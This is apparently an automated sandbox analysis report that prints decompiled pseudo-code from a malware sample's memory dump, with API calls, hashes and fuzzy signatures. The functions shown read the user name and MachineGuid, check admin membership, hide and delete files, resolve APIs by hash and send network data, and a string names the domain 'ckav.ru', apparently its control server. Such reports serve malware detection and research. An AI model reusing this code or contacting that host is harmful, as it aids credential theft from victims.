0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e9e
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}

0x00402bb2
0x00402bc0
0x00000000
0x00402bc0
0x00402bc7

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
